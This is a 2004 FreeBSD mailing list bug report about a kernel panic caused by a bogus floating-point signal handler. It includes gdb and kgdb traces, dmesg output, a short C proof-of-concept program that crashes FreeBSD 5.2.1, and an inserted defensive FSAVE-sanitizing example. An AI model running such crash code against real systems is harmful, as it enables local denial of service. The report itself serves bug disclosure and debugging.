Date:      Wed, 16 Jun 2004 12:57:06 +0200
From:      Simon Barner <barner@in.tum.de>
To:        current@freebsd.org
Subject:   Bogus signal handler causes kernel panic (5.2.1-p8/i386)
Message-ID:  <20040616105706.GC1140@zi025.glhnet.mhn.de>

Hi,

I tried the local denial of service attack described in [1], which was
reported for Linux 2.4 and 2.6 some days ago (see [2] for the original
thread in linux.kernel), on my FreeBSD 5.2.1-p8 system.

The result is a kernel panic (back trace attached).

Since des@ told me in a private mail that he could not reproduce the
panic on -CURRENT, I'd like to ask how to proceed from here.

Is the problem known to be fixed in current?
Is somebody able to reproduce this on FreeBSD 5.2.1 (I am sorry,
upgrading to -CURRENT is out of the question for me)?

Please note that the problem does not exist on FreeBSD 4.9 (the test
program simply dumps core (bt attached)).

Thanks in advance for your hints,
 Simon

[1] http://linuxreviews.org/news/2004-06-11_kernel_crash/#toc1
[2] http://groups.google.de/groups?hl=de&lr=&ie=UTF-8&frame=right&th=f7580d647408b95b&seekm=26hGq-Zr-31%40gated-at.bofh.it#link1

Attachment: FreeBSD4.log

Script started on Tue Jun 15 10:35:59 2004
zi025:~ % gdb a.out a.out.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...Deprecated bfd_read called at /usr/src/gnu/usr.bin/binutils/gdb/../../../../contrib/gdb/gdb/dbxread.c line 2627 in elfstab_build_psymtabs
Deprecated bfd_read called at /usr/src/gnu/usr.bin/binutils/gdb/../../../../contrib/gdb/gdb/dbxread.c line 933 in fill_symbuf

Core was generated by `a.out'.
Program terminated with signal 8, Floating point exception.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0  0x804854f in Handler (ignore=14) at linux-kernel-crash.c:8
8	 __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
(gdb) bt
#0  0x804854f in Handler (ignore=14) at linux-kernel-crash.c:8
#1  0xbfbfffac in ?? ()
#2  0x80484a6 in _start ()
(gdb) bt full
#0  0x804854f in Handler (ignore=14) at linux-kernel-crash.c:8
	fpubuf = "\000\000ÿÿÿÿÿÿ3á(À\b\000Ð\001\000\000\000\000\000\000ÿÿ", '\000' <repeats 37 times>, "\200ÿ?\000\000\000\000\000\000\000\200ë?\000\000\000\000\000\000\000\200ÿ?\000\220ª&\210º\017\200ÿ?\000š\215é\tK< ö?òâ\004("
#1  0xbfbfffac in ?? ()
No symbol table info available.
#2  0x80484a6 in _start ()
No symbol table info available.
(gdb) 
zi025:~ % 

Script done on Tue Jun 15 10:36:14 2004
FreeBSD zi025.glhnet.mhn.de 4.9-STABLE FreeBSD 4.9-STABLE #1: Wed Mar 10 04:01:44 CET 2004 simon@zi025.glhnet.mhn.de:/usr/src/sys/compile/KISTE i386

Attachment: FreeBSD5.log

Script started on Tue Jun 15 10:40:03 2004
zi025:/home/simon # gdb -k /sys/i386/compile/KISTE/kernel.debug /var/crash/vmcore.2
GNU gdb 5.2.1 (FreeBSD)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
panic: arithmetic trap
panic messages:
---
Fatal trap 6: arithmetic trap while in kernel mode
instruction pointer	= 0x8:0xc061670a
stack pointer	        = 0x10:0xcc4299e4
frame pointer	        = 0x10:0xcc4299e4
code segment		= base 0x0, limit 0xfffff, type 0x1b
			= DPL 0, pres 1, def32 1, gran 1
processor eflags	= resume, IOPL = 0
current process		= 56940 (a.out)
trap number		= 6
panic: arithmetic trap

syncing disks, buffers remaining... 1819 1819 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818 1818
giving up on 1102 buffers
Uptime: 23h21m6s
Dumping 192 MB
[CTRL-C to abort] [CTRL-C to abort] [CTRL-C to abort]  16 32 48 64 80 96 112 128 144 160 176
---
Reading symbols from /boot/kernel/fdescfs.ko...done.
Loaded symbols for /boot/kernel/fdescfs.ko
Reading symbols from /boot/kernel/green_saver.ko...done.
Loaded symbols for /boot/kernel/green_saver.ko
#0  doadump () at ../../../kern/kern_shutdown.c:240
240		dumping++;
(kgdb) bt
#0  doadump () at ../../../kern/kern_shutdown.c:240
#1  0xc04f0cbb in boot (howto=256) at ../../../kern/kern_shutdown.c:372
#2  0xc04f0f91 in panic () at ../../../kern/kern_shutdown.c:550
#3  0xc0611f68 in trap_fatal (frame=0xcc4299a4, eva=0)
    at ../../../i386/i386/trap.c:821
#4  0xc0611ab4 in trap (frame=
      {tf_fs = 24, tf_es = 16, tf_ds = 16, tf_edi = 0, tf_esi = -1033510592, tf_ebp = -868050460, tf_isp = -868050480, tf_ebx = 514, tf_edx = -1033510592, tf_ecx = -868050288, tf_eax = -868050288, tf_trapno = 6, tf_err = 0, tf_eip = -1067358454, tf_cs = 8, tf_eflags = 65606, tf_esp = -868050444, tf_ss = -1067358532})
    at ../../../i386/i386/trap.c:618
#5  0xc0605998 in calltrap () at {standard input}:94
#6  0xc06166bc in npxsetregs (td=0x0, addr=0x0) at ../../../i386/isa/npx.c:954
#7  0xc060bd6b in set_fpcontext (td=0xc265e140, mcp=0x0)
    at ../../../i386/i386/machdep.c:2529
#8  0xc060a76a in sigreturn (td=0xc265e140, uap=0x0)
    at ../../../i386/i386/machdep.c:982
#9  0xc061224b in syscall (frame=
      {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077942784, tf_esi = -1077942776, tf_ebp = -1077942856, tf_isp = -868049548, tf_ebx = 1, tf_edx = 672409248, tf_ecx = 13, tf_eax = 417, tf_trapno = 22, tf_err = 2, tf_eip = -1077936211, tf_cs = 31, tf_eflags = 582, tf_esp = -1077943720, tf_ss = 47})
    at ../../../i386/i386/trap.c:1010
#10 0xc06059ed in Xint0x80_syscall () at {standard input}:136
---Can't read userspace from dump, or kernel process---

(kgdb) bt full
#0  doadump () at ../../../kern/kern_shutdown.c:240
No locals.
#1  0xc04f0cbb in boot (howto=256) at ../../../kern/kern_shutdown.c:372
No locals.
#2  0xc04f0f91 in panic () at ../../../kern/kern_shutdown.c:550
	td = (struct thread *) 0xc265e140
	bootopt = 256
	newpanic = 0
	ap = 0xcc42994c "G\001eÀ"
	buf = "arithmetic trap", '\0' <repeats 240 times>
#3  0xc0611f68 in trap_fatal (frame=0xcc4299a4, eva=0)
    at ../../../i386/i386/trap.c:821
	code = 16
	type = 6
	ss = 16
	esp = 0
	softseg = {ssd_base = 0, ssd_limit = 1048575, ssd_type = 27,
  ssd_dpl = 0, ssd_p = 1, ssd_xx = 0, ssd_xx1 = 0, ssd_def32 = 1, ssd_gran = 1}
#4  0xc0611ab4 in trap (frame=
      {tf_fs = 24, tf_es = 16, tf_ds = 16, tf_edi = 0, tf_esi = -1033510592, tf_ebp = -868050460, tf_isp = -868050480, tf_ebx = 514, tf_edx = -1033510592, tf_ecx = -868050288, tf_eax = -868050288, tf_trapno = 6, tf_err = 0, tf_eip = -1067358454, tf_cs = 8, tf_eflags = 65606, tf_esp = -868050444, tf_ss = -1067358532})
    at ../../../i386/i386/trap.c:618
	td = (struct thread *) 0xc265e140
	p = (struct proc *) 0xc265da98
	sticks = 3261455000
	i = 0
	ucode = 0
	type = 6
	code = 0
	eva = 0
#5  0xc0605998 in calltrap () at {standard input}:94
No locals.
#6  0xc06166bc in npxsetregs (td=0x0, addr=0x0) at ../../../i386/isa/npx.c:954
	s = 514
#7  0xc060bd6b in set_fpcontext (td=0xc265e140, mcp=0x0)
    at ../../../i386/i386/machdep.c:2529
	addr = (union savefpu *) 0xcc429a90
#8  0xc060a76a in sigreturn (td=0xc265e140, uap=0x0)
    at ../../../i386/i386/machdep.c:982
	uc = {uc_sigmask = {__bits = {0, 0, 0, 0}}, uc_mcontext = {
    mc_onstack = 0, mc_gs = 47, mc_fs = 47, mc_es = 47, mc_ds = 47,
    mc_edi = -1077942784, mc_esi = -1077942776, mc_ebp = -1077942856,
    mc_isp = -868049548, mc_ebx = 1, mc_edx = 672409248, mc_ecx = 13,
    mc_eax = 1, mc_trapno = 12, mc_err = 2, mc_eip = 671874187, mc_cs = 31,
    mc_eflags = 662, mc_esp = -1077942900, mc_ss = 47, mc_len = 640,
    mc_fpformat = 65537, mc_ownedfp = 131074, mc_spare1 = {0}, mc_fpstate = {
      -60801, -65536, -1, 0, 0, 0, -65536, 613566464, -2061200823, -536854528,
      -1, 1073451007, 0, 0, 1207959552, -1840700270, 1073775908, 0, -63161344,
      16382, -251658240, 1073279216, 0, -286322986, 16391, 1011515392,
      1073865788, 0 <repeats 101 times>}, mc_spare2 = {0, 0, 0, 0, 0, 0, 0,
      0}}, uc_link = 0x0, uc_stack = {ss_sp = 0x0, ss_size = 0, ss_flags = 4},
  uc_flags = 0, __spare__ = {0, 0, 0, 0}}
	p = (struct proc *) 0xc265da98
	regs = (struct trapframe *) 0xcc429d48
	cs = 0
	eflags = 662
	error = 0
	ret = 0
#9  0xc061224b in syscall (frame=
      {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077942784, tf_esi = -1077942776, tf_ebp = -1077942856, tf_isp = -868049548, tf_ebx = 1, tf_edx = 672409248, tf_ecx = 13, tf_eax = 417, tf_trapno = 22, tf_err = 2, tf_eip = -1077936211, tf_cs = 31, tf_eflags = 582, tf_esp = -1077943720, tf_ss = 47})
    at ../../../i386/i386/trap.c:1010
	params = 0xbfbfe25c---Can't read userspace from dump, or kernel process---

(kgdb) 
zi025:/home/simon # 

Script done on Tue Jun 15 10:40:48 2004
FreeBSD zi025.glhnet.mhn.de 5.2.1-RELEASE-p8 FreeBSD 5.2.1-RELEASE-p8 #1: Mon May 31 13:29:26 CEST 2004 simon@zi025.glhnet.mhn.de:/usr/src/sys/i386/compile/KISTE i386

Attachment: crash.c.txt

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: saves the i387 state into a stack buffer and restores
 * it again; fsave/frstor are the instructions the traces above point at. */
static void Handler(int ignore)
{
	char fpubuf[108];	/* size of a 32-bit FSAVE image */
	__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
	write(2, "*", 1);
	__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
	struct itimerval spec;

	signal(SIGALRM, Handler);
	/* deliver SIGALRM every 100 microseconds */
	spec.it_interval.tv_sec = 0;
	spec.it_interval.tv_usec = 100;
	spec.it_value.tv_sec = 0;
	spec.it_value.tv_usec = 100;
	setitimer(ITIMER_REAL, &spec, NULL);
	while (1)
		write(1, ".", 1);

	return 0;
}
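The 5.2.1 trace shows sigreturn passing a user-supplied mc_fpstate to npxsetregs, whose frstor then takes an arithmetic trap in kernel mode. As an added example (not FreeBSD's code or its fix for this report), this checks and sanitizes a 108-byte i387 FSAVE image so that restoring it cannot leave an unmasked exception pending; the layout constants are the documented 32-bit FSAVE format, cw 0x127F / sw 0 are taken from the mc_fpstate dump above, and the cw 0 / sw 0x0081 image is constructed.

```c
#include <stdint.h>
#include <string.h>

/* 32-bit protected-mode FSAVE/FRSTOR image: 108 bytes; control, status and
 * tag words sit in the low 16 bits of the first three 32-bit slots. */
#define FSAVE_LEN 108
#define OFF_CW 0
#define OFF_SW 4
#define OFF_TW 8
/* Status-word bits FRSTOR loads verbatim. With ES set, or an exception flag
 * set that the control word leaves unmasked, the next waiting FPU instruction
 * raises #MF (trap 6 on FreeBSD/i386) wherever it runs, kernel included. */
#define SW_EXC 0x003Fu  /* IE DE ZE OE UE PE */
#define SW_SF  0x0040u
#define SW_ES  0x0080u
#define SW_B   0x8000u

static uint16_t get16(const uint8_t *p, int off) { return (uint16_t)(p[off] | p[off + 1] << 8); }
static void put16(uint8_t *p, int off, uint16_t v) { p[off] = (uint8_t)v; p[off + 1] = (uint8_t)(v >> 8); }

/* Constructed image: given control/status words, tag 0xFFFF (all registers empty). */
void fsave_build(uint8_t img[FSAVE_LEN], uint16_t cw, uint16_t sw)
{
    memset(img, 0, FSAVE_LEN);
    put16(img, OFF_CW, cw);
    put16(img, OFF_SW, sw);
    put16(img, OFF_TW, 0xFFFF);
}

/* 1 if restoring this image would leave an unmasked exception pending. */
int fsave_pending(const uint8_t img[FSAVE_LEN])
{
    uint16_t cw = get16(img, OFF_CW), sw = get16(img, OFF_SW);
    return (sw & SW_ES) != 0 || (sw & ~cw & SW_EXC) != 0;
}

/* Clear exception state so FRSTOR cannot arm a deferred #MF; condition codes
 * and TOP survive. Returns the sanitized status word. */
uint16_t fsave_sanitize(uint8_t img[FSAVE_LEN])
{
    uint16_t sw = get16(img, OFF_SW) & (uint16_t)~(SW_EXC | SW_SF | SW_ES | SW_B);
    put16(img, OFF_SW, sw);
    return sw;
}

/* Wrappers over a freshly built image. cw 0x127F / sw 0 are the first words
 * of mc_fpstate in the dump above; cw 0 / sw 0x0081 (IE+ES) is constructed. */
int pending_for(uint16_t cw, uint16_t sw) { uint8_t img[FSAVE_LEN]; fsave_build(img, cw, sw); return fsave_pending(img); }
uint16_t sanitized_sw_for(uint16_t cw, uint16_t sw) { uint8_t img[FSAVE_LEN]; fsave_build(img, cw, sw); return fsave_sanitize(img); }
```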



Attachment: dmesg

Copyright (c) 1992-2004 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
	The Regents of the University of California. All rights reserved.
FreeBSD 5.2.1-RELEASE-p8 #1: Mon May 31 13:29:26 CEST 2004
    simon@zi025.glhnet.mhn.de:/usr/src/sys/i386/compile/KISTE
Preloaded elf kernel "/boot/kernel/kernel" at 0xc0753000.
Timecounter "i8254" frequency 1193182 Hz quality 0
CPU: AMD-K6(tm) 3D+ Processor (400.91-MHz 586-class CPU)
  Origin = "AuthenticAMD"  Id = 0x591  Stepping = 1
  Features=0x8021bf<FPU,VME,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX>
  AMD Features=0x80000800<SYSCALL,3DNow!>
real memory  = 201326592 (192 MB)
avail memory = 190103552 (181 MB)
netsmb_dev: loaded
K6-family MTRR support enabled (2 registers)
npx0: [FAST]
npx0: <math processor> on motherboard
npx0: INT 16 interface
pcibios: BIOS version 2.10
Using $PIR table, 5 entries at 0xc00fdde0
pcib0: <VIA 82C598MVP (Apollo MVP3) host bridge> at pcibus 0 on motherboard
pci0: <PCI bus> on pcib0
pci_cfgintr: 0:17 INTA BIOS irq 9
pci_cfgintr: 0:18 INTA BIOS irq 3
pcib1: <PCI-PCI bridge> at device 1.0 on pci0
pci1: <PCI bus> on pcib1
isab0: <PCI-ISA bridge> at device 7.0 on pci0
isa0: <ISA bus> on isab0
atapci0: <VIA 82C586B UDMA33 controller> port 0xe000-0xe00f at device 7.1 on pci0
ata0: at 0x1f0 irq 14 on atapci0
ata0: [MPSAFE]
ata1: at 0x170 irq 15 on atapci0
ata1: [MPSAFE]
xl0: <3Com 3c905-TX Fast Etherlink XL> port 0xe800-0xe83f irq 9 at device 17.0 on pci0
xl0: Ethernet address: 00:60:08:4a:00:e5
miibus0: <MII bus> on xl0
nsphy0: <DP83840 10/100 media interface> on miibus0
nsphy0:  10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto
pci0: <display, VGA> at device 18.0 (no driver attached)
orm0: <Option ROM> at iomem 0xc0000-0xc87ff on isa0
pmtimer0 on isa0
atkbdc0: <Keyboard controller (i8042)> at port 0x64,0x60 on isa0
atkbd0: <AT Keyboard> flags 0x1 irq 1 on atkbdc0
kbd0 at atkbd0
psm0: <PS/2 Mouse> irq 12 on atkbdc0
psm0: model Generic PS/2 mouse, device ID 0
fdc0: <Enhanced floppy controller (i82077, NE72065 or clone)> at port 0x3f7,0x3f0-0x3f5 irq 6 drq 2 on isa0
fdc0: FIFO enabled, 8 bytes threshold
fd0: <1440-KB 3.5" drive> on fdc0 drive 0
ppc0: <Parallel port> at port 0x378-0x37f irq 7 on isa0
ppc0: SMC-like chipset (ECP/EPP/PS2/NIBBLE) in COMPATIBLE mode
ppc0: FIFO with 16/16/15 bytes threshold
ppbus0: <Parallel port bus> on ppc0
lpt0: <Printer> on ppbus0
lpt0: Interrupt-driven port
ppi0: <Parallel I/O> on ppbus0
sc0: <System console> at flags 0x100 on isa0
sc0: VGA <16 virtual consoles, flags=0x300>
sio0: configured irq 4 not in bitmap of probed irqs 0
sio0: port may not be enabled
sio0 at port 0x3f8-0x3ff irq 4 flags 0x10 on isa0
sio0: type 8250 or not responding
sio1: configured irq 3 not in bitmap of probed irqs 0
sio1: port may not be enabled
vga0: <Generic ISA VGA> at port 0x3c0-0x3df iomem 0xa0000-0xbffff on isa0
sbc0: <ESS ES1868> at port 0x330-0x331,0x388-0x38b,0x220-0x22f irq 5 drq 0,1 on isa0
pcm0: <ESS 18xx DSP> on sbc0
ata2: <Generic ESDI/IDE/ATA controller> at port 0x36e-0x36f,0x168-0x16f irq 10 on isa0
ata2: [MPSAFE]
unknown: <PNP0303> can't assign resources (port)
unknown: <PNP0f13> can't assign resources (irq)
unknown: <PNP0700> can't assign resources (port)
unknown: <PNP0401> can't assign resources (port)
Timecounter "TSC" frequency 400911461 Hz quality 800
Timecounters tick every 10.000 msec
IP Filter: v3.4.31 initialized.  Default = block all, Logging = enabled
GEOM: create disk ad0 dp=0xc2350360
ad0: 9787MB <WDC WD102AA> [19885/16/63] at ata0-master UDMA33
acd0: CDRW <HL-DT-ST RW/DVD GCC-4120B> at ata1-master PIO4
GEOM: create disk ad3 dp=0xc2350160
ad3: 117246MB <Maxtor 6Y120L0> [238216/16/63] at ata1-slave UDMA33
GEOM: create disk cd0 dp=0xc22e7e00
cd0 at ata1 bus 0 target 0 lun 0
cd0: <HL-DT-ST RW/DVD GCC-4120B 2.02> Removable CD-ROM SCSI-0 device
cd0: 16.000MB/s transfers
cd0: Attempt to query device size failed: NOT READY, Medium not present
Mounting root from ufs:/dev/ad0s2a
